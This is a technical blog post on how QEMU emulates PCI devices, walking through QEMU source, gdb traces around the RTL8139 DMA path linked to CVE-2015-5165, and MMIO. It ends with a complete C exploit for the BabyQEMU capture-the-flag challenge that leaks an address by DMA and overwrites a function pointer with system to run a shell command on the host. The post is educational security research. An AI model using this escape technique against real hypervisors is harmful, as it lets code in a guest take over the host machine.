QEMU Internal: PCI Device

Introduction

In this post, I will give an introduction of the PCI device emulation in QEMU. I will start from the function pci_register_bar. Then I will introduce the PCI bus initialization and update. Based on the information given above, I will explain how RTL8139 and MMIO are expected to work through DMA (Direct Memory Access).
I also strongly recommend reading the reference [1] and [2]. They give some other useful information for PCI device in QEMU.

Function pci_register_bar

Let’s start from the realization function in RTL8139 to start the story.

memory_region_init_io(&s->bar_io, OBJECT(s), &rtl8139_io_ops, s,
                      "rtl8139", 0x100);
memory_region_init_io(&s->bar_mem, OBJECT(s), &rtl8139_mmio_ops, s,
                      "rtl8139", 0x100);
pci_register_bar(dev, 0, PCI_BASE_ADDRESS_SPACE_IO, &s->bar_io);
pci_register_bar(dev, 1, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->bar_mem);

After assigning the MemoryRegionOps to the newly allocated MemoryRegion, QEMU immediately starts to assign the those MemoryRegions to the PCI device.

Let us dig into this function and see what is going on there.

void pci_register_bar(PCIDevice *pci_dev, int region_num,
                      uint8_t type, MemoryRegion *memory)
{
    PCIIORegion *r;
    uint32_t addr;
    uint64_t wmask;
    pcibus_t size = memory_region_size(memory);

    assert(region_num >= 0);
    assert(region_num < PCI_NUM_REGIONS);
    if (size & (size-1)) {
        fprintf(stderr, "ERROR: PCI region size must be pow2 "
                    "type=0x%x, size=0x%"FMT_PCIBUS"\n", type, size);
        exit(1);
    }

    r = &pci_dev->io_regions[region_num];
    r->addr = PCI_BAR_UNMAPPED;
    r->size = size;
    r->type = type;
    r->memory = NULL;

    wmask = ~(size - 1);
    addr = pci_bar(pci_dev, region_num);
    if (region_num == PCI_ROM_SLOT) {
        /* ROM enable bit is writable */
        wmask |= PCI_ROM_ADDRESS_ENABLE;
    }
    pci_set_long(pci_dev->config + addr, type);
    if (!(r->type & PCI_BASE_ADDRESS_SPACE_IO) &&
        r->type & PCI_BASE_ADDRESS_MEM_TYPE_64) {
        pci_set_quad(pci_dev->wmask + addr, wmask);
        pci_set_quad(pci_dev->cmask + addr, ~0ULL);
    } else {
        pci_set_long(pci_dev->wmask + addr, wmask & 0xffffffff);
        pci_set_long(pci_dev->cmask + addr, 0xffffffff);
    }
    pci_dev->io_regions[region_num].memory = memory;
    pci_dev->io_regions[region_num].address_space
        = type & PCI_BASE_ADDRESS_SPACE_IO
        ? pci_dev->bus->address_space_io
        : pci_dev->bus->address_space_mem;
}

typedef struct PCIIORegion {
    pcibus_t addr; /* current PCI mapping address. -1 means not mapped */
#define PCI_BAR_UNMAPPED (~(pcibus_t)0)
    pcibus_t size;
    uint8_t type;
    MemoryRegion *memory;
    MemoryRegion *address_space;
} PCIIORegion;

The main goal of this function is to attach newly allocated MemoryRegions to the PCI bus address space. This function is divided into two steps.
In the first step, it retrieves the corresponding PCIIORegion, and assigns basic information to that (r->addr = PCI_BAR_UNMAPPED and etc.).
In the second step, it assigns corresponding value to memory and address_space respectively.
The two steps above represent two important functions in pci.c: pci_qdev_realize (PCI device registration) and pci_update_mappings (PCI device update)

PCI device registration

To give a general overview of this process, I set a breakpoint at pci_qdev_realize and get the following stack trace at first hit.

Thread 1 "qemu-system-x86" hit Breakpoint 1, pci_qdev_realize (qdev=0x5555566045a0, errp=0x7fffffffd630)
    at /home/dango/Security/qemu/hw/pci/pci.c:1822
1822	{
(gdb) bt
#0  pci_qdev_realize at /qemu/hw/pci/pci.c:1822
#1  device_set_realized at /qemu/hw/core/qdev.c:1046
#2  property_set_bool at /qemu/qom/object.c:1667
#3  object_property_set at /qemu/qom/object.c:946
#4  object_property_set_qobject at /qemu/qom/qom-qobject.c:24
#5  object_property_set_bool at /qemu/qom/object.c:1015
#6  qdev_init_nofail at /qemu/hw/core/qdev.c:366
#7  pci_create_simple_multifunction at /qemu/hw/pci/pci.c:1893
#8  pci_create_simple at /qemu/hw/pci/pci.c:1904
#9  i440fx_init at /qemu/hw/pci-host/piix.c:331
#10 pc_init1 at /qemu/hw/i386/pc_piix.c:203
#11 pc_init_v2_4 at /qemu/hw/i386/pc_piix.c:489
#12 main at /qemu/vl.c:4510

It can be observed that the initialization of PCI device starts from pc_init1 function. If you still remember what I talk about in my previous post, this function is also responsible for initializing RAM memory. The initialization of PCI goes as below:

if (pci_enabled) {
    pci_memory = g_new(MemoryRegion, 1);
    memory_region_init(pci_memory, NULL, "pci", UINT64_MAX);
    rom_memory = pci_memory;
} else {
    pci_memory = NULL;
    rom_memory = system_memory;
}
//some other code
if (pci_enabled) {
    pci_bus = i440fx_init(&i440fx_state, &piix3_devfn, &isa_bus, gsi,
                          system_memory, system_io, machine->ram_size,
                          below_4g_mem_size,
                          above_4g_mem_size,
                          pci_memory, ram_memory);
} else {
    pci_bus = NULL;
    i440fx_state = NULL;
    isa_bus = isa_bus_new(NULL, get_system_memory(), system_io);
    no_hpet = 1;
}

After this, go deep into pci_qdev_realize to see what is happening there.

static void pci_qdev_realize(DeviceState *qdev, Error **errp)
{
    PCIDevice *pci_dev = (PCIDevice *)qdev;
    PCIDeviceClass *pc = PCI_DEVICE_GET_CLASS(pci_dev);
    Error *local_err = NULL;
    PCIBus *bus;
    bool is_default_rom;

    /* initialize cap_present for pci_is_express() and pci_config_size() */
    if (pc->is_express) {
        pci_dev->cap_present |= QEMU_PCI_CAP_EXPRESS;
    }

    bus = PCI_BUS(qdev_get_parent_bus(qdev));
    pci_dev = do_pci_register_device(pci_dev, bus,
                                     object_get_typename(OBJECT(qdev)),
                                     pci_dev->devfn, errp);
    if (pci_dev == NULL)
        return;

    //some other code
}

Here, we come across the most important function of PCI initialization is do_pci_register_device, which will does almost everything about PCI device initialization.

/* -1 for devfn means auto assign */
static PCIDevice *do_pci_register_device(PCIDevice *pci_dev, PCIBus *bus,
                                         const char *name, int devfn,
                                         Error **errp)
{
    PCIDeviceClass *pc = PCI_DEVICE_GET_CLASS(pci_dev);
    PCIConfigReadFunc *config_read = pc->config_read;
    PCIConfigWriteFunc *config_write = pc->config_write;
    Error *local_err = NULL;
    AddressSpace *dma_as;

    //some sanity check

    pci_dev->bus = bus;
    pci_dev->devfn = devfn;
    dma_as = pci_device_iommu_address_space(pci_dev);

    memory_region_init_alias(&pci_dev->bus_master_enable_region,
                             OBJECT(pci_dev), "bus master",
                             dma_as->root, 0, memory_region_size(dma_as->root));
    memory_region_set_enabled(&pci_dev->bus_master_enable_region, false);
    address_space_init(&pci_dev->bus_master_as, &pci_dev->bus_master_enable_region,
                       name);

    pstrcpy(pci_dev->name, sizeof(pci_dev->name), name);
    pci_dev->irq_state = 0;
    pci_config_alloc(pci_dev);

    pci_config_set_vendor_id(pci_dev->config, pc->vendor_id);
    pci_config_set_device_id(pci_dev->config, pc->device_id);
    pci_config_set_revision(pci_dev->config, pc->revision);
    pci_config_set_class(pci_dev->config, pc->class_id);

    //some check
    pci_init_cmask(pci_dev);
    pci_init_wmask(pci_dev);
    pci_init_w1cmask(pci_dev);
    if (pc->is_bridge) {
        pci_init_mask_bridge(pci_dev);
    }
    pci_init_multifunction(bus, pci_dev, &local_err);
    if (local_err) {
        error_propagate(errp, local_err);
        do_pci_unregister_device(pci_dev);
        return NULL;
    }

    if (!config_read)
        config_read = pci_default_read_config;
    if (!config_write)
        config_write = pci_default_write_config;
    pci_dev->config_read = config_read;
    pci_dev->config_write = config_write;
    bus->devices[devfn] = pci_dev;
    pci_dev->version_id = 2; /* Current pci device vmstate version */
    return pci_dev;
}

struct PCIDevice {
    //other member variable
    AddressSpace bus_master_as;
    MemoryRegion bus_master_enable_region;
    //other member variable
};

In do_pci_register_device, MemoryRegion bus_master_enable_region and AddressSpace bus_master_as is initialized accordingly.

PCI device update

Except for the PCI device that is turned on by default, there also exist newly added PCI device like RTL8139. Here comes to function pci_update_mappings to add the newly added PCI device into the PCI bus address.

static void pci_update_mappings(PCIDevice *d)
{
    PCIIORegion *r;
    int i;
    pcibus_t new_addr;

    for(i = 0; i < PCI_NUM_REGIONS; i++) {
        r = &d->io_regions[i];

        /* this region isn't registered */
        if (!r->size)
            continue;

        new_addr = pci_bar_address(d, i, r->type, r->size);

        /* This bar isn't changed */
        if (new_addr == r->addr)
            continue;

        /* now do the real mapping */
        if (r->addr != PCI_BAR_UNMAPPED) {
            trace_pci_update_mappings_del(d, pci_bus_num(d->bus),
                                          PCI_FUNC(d->devfn),
                                          PCI_SLOT(d->devfn),
                                          i, r->addr, r->size);
            memory_region_del_subregion(r->address_space, r->memory);
        }
        r->addr = new_addr;
        if (r->addr != PCI_BAR_UNMAPPED) {
            trace_pci_update_mappings_add(d, pci_bus_num(d->bus),
                                          PCI_FUNC(d->devfn),
                                          PCI_SLOT(d->devfn),
                                          i, r->addr, r->size);
            memory_region_add_subregion_overlap(r->address_space,
                                                r->addr, r->memory, 1);
        }
    }

    pci_update_vga(d);
}

It will traverse the list of PCIIORegion, retrieve a reserved region address for current checking slot. If the current checking slot is an unmapped PCIIORegion, it will assign the region address to the current PCIIORegion and add the region address as a subregion to the memoru_address_space.
Now, let me verify the procedure mentioned above with RTL8139 and go further into MMIO with BabyQEMU in XCTF HITB 2017.

RTL8139

My target is function pci_dma_read in the vulnerable function of CVE-2015-5165. I use the following debugging script to verify the procedure mentioned above.

set pagination off
set logging redirect on
set logging on

break do_pci_register_device
commands
p/x $rdi
x/s $rdx
cont
end

break pci_update_mappings
commands
p/x $rdi
set $name = ((struct PCIDevice *)($rdi))->name
if( strcmp($name,"rtl8139")==0)
bt
end

cont
end

break pci_dma_read
commands
p/x $rdi
set $name = ((struct PCIDevice *)($rdi))->name
if(strcmp($name,"rtl8139")==0)
bt
end
cont
end

run -kernel /home/dango/Kernel/linux-4.15.7/arch/x86/boot/bzImage   -append "console=ttyS0 root=/dev/sda rw"  -hda /home/dango/Kernel/Image/image03/qemu.img  -enable-kvm -m 2G -nographic -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1

Then we can get the result in time order as below:

Thread 1 "qemu-system-x86" hit Breakpoint 1, do_pci_register_device (pci_dev=0x5555573cd140, bus=0x555556603910, name=0x555556371cc0 "rtl8139", devfn=-1, errp=0x7fffffffd7f0) at /home/dango/Security/qemu/hw/pci/pci.c:843
843	{
$6 = 0x5555573cd140
0x555556371cc0:	"rtl8139"

Thread 1 "qemu-system-x86" hit Breakpoint 2, pci_update_mappings (d=0x5555573cd140) at /home/dango/Security/qemu/hw/pci/pci.c:1135
1135	    for(i = 0; i < PCI_NUM_REGIONS; i++) {
$13 = 0x5555573cd140
#0  pci_update_mappings (d=0x5555573cd140) at /qemu/hw/pci/pci.c:1135
#1  pci_do_device_reset (dev=0x5555573cd140) at /qemu/hw/pci/pci.c:242
#2  pcibus_reset (qbus=0x555556603910) at /qemu/hw/pci/pci.c:270
#3  qbus_reset_one (bus=0x555556603910, opaque=0x0) at /qemu/hw/core/qdev.c:318
#4  qbus_walk_children (bus=0x555556603910, pre_devfn=0x0, pre_busfn=0x0, post_devfn=0x5555557d4494 <qdev_reset_one>, post_busfn=0x5555557d44b7 <qbus_reset_one>, opaque=0x0) at /qemu/hw/core/qdev.c:604
#5  qdev_walk_children (dev=0x555556602040, pre_devfn=0x0, pre_busfn=0x0, post_devfn=0x5555557d4494 <qdev_reset_one>, post_busfn=0x5555557d44b7 <qbus_reset_one>, opaque=0x0) at /qemu/hw/core/qdev.c:629
#6  qbus_walk_children (bus=0x555556416780, pre_devfn=0x0, pre_busfn=0x0, post_devfn=0x5555557d4494 <qdev_reset_one>, post_busfn=0x5555557d44b7 <qbus_reset_one>, opaque=0x0) at /qemu/hw/core/qdev.c:595
#7  qbus_reset_all (bus=0x555556416780) at /qemu/hw/core/qdev.c:330
#8  qbus_reset_all_fn (opaque=0x555556416780) at /qemu/hw/core/qdev.c:336
#9  qemu_devices_reset () at /qemu/vl.c:1722
#10 qemu_system_reset (report=false) at /qemu/vl.c:1735
#11 main (argc=19, argv=0x7fffffffde98, envp=0x7fffffffdf38) at /qemu/vl.c:4617


Thread 4 "qemu-system-x86" hit Breakpoint 3, pci_dma_read (dev=0x5555573cd140, addr=2033036384, buf=0x7fffd5405030, len=4) at /home/dango/Security/qemu/include/hw/pci/pci.h:696
696	    return pci_dma_rw(dev, addr, buf, len, DMA_DIRECTION_TO_DEVICE);
$3777 = 0x5555573cd140
#0  pci_dma_read (dev=0x5555573cd140, addr=2033036384, buf=0x7fffd5405030, len=4) at /qemu/include/hw/pci/pci.h:696
#1  rtl8139_cplus_transmit_one (s=0x5555573cd140) at /qemu/hw/net/rtl8139.c:1985
#2  rtl8139_cplus_transmit (s=0x5555573cd140) at /qemu/hw/net/rtl8139.c:2412
#3  rtl8139_io_writeb (opaque=0x5555573cd140, addr=217 '\331', val=64) at /qemu/hw/net/rtl8139.c:2795
#4  rtl8139_ioport_write (opaque=0x5555573cd140, addr=217, val=64, size=1) at /qemu/hw/net/rtl8139.c:3353
#5  memory_region_write_accessor (mr=0x5555573cfb68, addr=217, value=0x7fffd54052f8, size=1, shift=0, mask=255, attrs=...) at /qemu/memory.c:450
#6  access_with_adjusted_size (addr=217, value=0x7fffd54052f8, size=1, access_size_min=1, access_size_max=4, access=0x55555564d8bc <memory_region_write_accessor>, mr=0x5555573cfb68, attrs=...) at /qemu/memory.c:506
#7  memory_region_dispatch_write (mr=0x5555573cfb68, addr=217, data=64, size=1, attrs=...) at /qemu/memory.c:1158
#8  address_space_rw (as=0x555555e96f20 <address_space_io>, addr=49369, attrs=..., buf=0x7ffff7fe9000 "@", len=1, is_write=true) at /qemu/exec.c:2451
#9  kvm_handle_io (port=49369, attrs=..., data=0x7ffff7fe9000, direction=1, size=1, count=1) at /qemu/kvm-all.c:1680
#10 kvm_cpu_exec (cpu=0x555556416c70) at /qemu/kvm-all.c:1849
#11 qemu_kvm_cpu_thread_fn (arg=0x555556416c70) at /qemu/cpus.c:979
#12 start_thread (arg=0x7fffd5408700) at pthread_create.c:465
#13 clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95

In the first place, it can be observed that do_pci_register_device is to register the PCIDevice at 0x5555573cd140. Then we can see the stack trace of invoking pci_update_mappings. With the help of our debugging script we can observe that the update procedure does not take place only once. Actually, it will be updated multiple times. At the time of invoking pci_dma_read, its root MemoryRegion is address_space_io, which is for IO port communication.

Memory Mapped IO

Now let us get back to the BabyQEMU in XCTF HITB 2017. We can find something new from the binary code in pci_hitb_realize.

#define  PCI_BASE_ADDRESS_SPACE_IO	0x01
#define  PCI_BASE_ADDRESS_SPACE_MEMORY	0x00

pci_hitb_realize(PCIDevice *dev, Error **errp)
{
HITBState *s = HITB(dev);
memory_region_init_io(&s->bar_mem, OBJECT(s), &hitb_mmio_ops, s,
                          "hitb-mmio", 0x100000uLL);
pci_register_bar(dev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->bar_mem);
}

From the code above, we can tell that s->bar_mem will be assigned to global variable memory_address_space.

From the knowledge of the QEMU internal, the code given by KITCTF seems a little bit tedious. Here we give a simplified version of the final exploit, which removes some abundant code and check in the original write-up. In the code below, I only create a mapped memory from a device and replace the mapped dmabuf with an allocated buffer in heap. In the end, we get the same result as the write-up given by KITCTF.

#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

#define DMA_BASE 0x40000

unsigned char* iomem;
unsigned char* dmabuf;
uint64_t dmabuf_phys_addr;

#define PAGE_SHIFT  12
#define PAGE_SIZE   (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN     ((1ull << 55) - 1)

int fd;

void die(const char* msg)
{
	perror(msg);
	exit(-1);
}


uint32_t page_offset(uint32_t addr)
{
    return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr)
{
	uint64_t pme, gfn;
	size_t offset;
	offset = ((uintptr_t)addr >> 9) & ~7;
	lseek(fd, offset, SEEK_SET);
	read(fd, &pme, 8);
	if (!(pme & PFN_PRESENT))
		return -1;
	gfn = pme & PFN_PFN;
	return gfn;
}

uint64_t gva_to_gpa(void *addr)
{
	uint64_t gfn = gva_to_gfn(addr);
	assert(gfn != -1);
	return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

void iowrite(uint64_t addr, uint64_t value)
{
	*((uint64_t*)(iomem + addr)) = value;
}

uint64_t ioread(uint64_t addr)
{
	return *((uint64_t*)(iomem + addr));
}

void dma_setcnt(uint32_t cnt)
{
	iowrite(144, cnt);
}

void dma_setdst(uint32_t dst)
{
	iowrite(136, dst);
}

void dma_setsrc(uint32_t src)
{
	iowrite(128, src);
}

void dma_start(uint32_t cmd)
{
	iowrite(152, cmd | 1);
}


void* dma_read(uint64_t addr, size_t len)
{
	dma_setsrc(addr);
	dma_setdst(dmabuf_phys_addr);
	dma_setcnt(len);

	dma_start(2);
	sleep(1);
}

void dma_write(uint64_t addr, void* buf, size_t len)
{
	assert(len < 0x1000);
	memcpy(dmabuf, buf, len);

	dma_setsrc(dmabuf_phys_addr);
	dma_setdst(addr);
	dma_setcnt(len);

	dma_start(0);

	sleep(1);
}

void dma_write_qword(uint64_t addr, uint64_t value)
{
	dma_write(addr, &value, 8);
}

uint64_t dma_read_qword(uint64_t addr)
{
	dma_read(addr, 8);
	return *((uint64_t*)dmabuf);
}

void dma_crypted_read(uint64_t addr, size_t len)
{
	dma_setsrc(addr);
	dma_setdst(dmabuf_phys_addr);
	dma_setcnt(len);

	dma_start(4 | 2);

	sleep(1);
}

int main(int argc, char *argv[])
{
	int fdmem = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
	if (fdmem == -1)
		die("open");
	iomem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fdmem, 0);

	if (iomem == MAP_FAILED)
		die("mmap");

	fd = open("/proc/self/pagemap", O_RDONLY);
	if (fd < 0) {
		perror("open");
		exit(1);
	}
	printf("iomem @ %p\n", iomem);
	
	dmabuf = malloc(0x1000);
	memset(dmabuf, '\x00', sizeof(dmabuf));
	dmabuf_phys_addr = gva_to_gpa(dmabuf);

	printf("DMA buffer (virt) @ %p\n", dmabuf);
	printf("DMA buffer (phys) @ %p\n", (void*)dmabuf_phys_addr);
	
	uint64_t hitb_enc = dma_read_qword(DMA_BASE + 0x1000);
	uint64_t binary = hitb_enc - 0x283dd0;
	printf("binary @ 0x%lx\n", binary);
	uint64_t system = binary + 0x1fdb18;

	dma_write_qword(DMA_BASE + 0x1000, system);
	char* payload = "cat flag;";

	dma_write(DMA_BASE + 0x100, payload, strlen(payload));

	dma_crypted_read(DMA_BASE + 0x100, 0x1);

	return 0;
}

The last remaining question is why we need to open “/sys/devices/pci0000:00/0000:00:04.0/resource0” for MMIO. The answer lies in the pci number.

Download pciutils to our machine, and type “lspci”. We can get the following result.

root@ubuntu:~# lspci
00:00.0 Host bridge: Intel Corporation 440FX - 82441FX PMC [Natoma] (rev 02)
00:01.0 ISA bridge: Intel Corporation 82371SB PIIX3 ISA [Natoma/Triton II]
00:01.1 IDE interface: Intel Corporation 82371SB PIIX3 IDE [Natoma/Triton II]
00:01.3 Bridge: Intel Corporation 82371AB/EB/MB PIIX4 ACPI (rev 03)
00:02.0 VGA compatible controller: Device 1234:1111 (rev 02)
00:03.0 Ethernet controller: Intel Corporation 82540EM Gigabit Ethernet Controller (rev 03)
00:04.0 Unclassified device [00ff]: Device 1234:2333 (rev 10)

From the result above, we can see that ID “00:04.0” is assigned to the shared memory for our exploit. Therefore, we have to open “/sys/devices/pci0000:00/0000:00:04.0/resource0” file for exploitation.

Conclusion

In this post, I give a detailed explanation of PCI device in QEMU machine. Then I use two examples ( one in DMA and one in MMIO) to show more details in the implementation of QEMU PCI emulation.
I think this will be my last post on QEMU internal. So far I have explained every possible questions that may arise during the exploitation of QEMU.

Reference

[1] http://nairobi-embedded.org/mmap_mmio_dma.html
[2] http://nairobi-embedded.org/linux_pci_device_driver.html

2 thoughts on “QEMU Internal: PCI Device

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.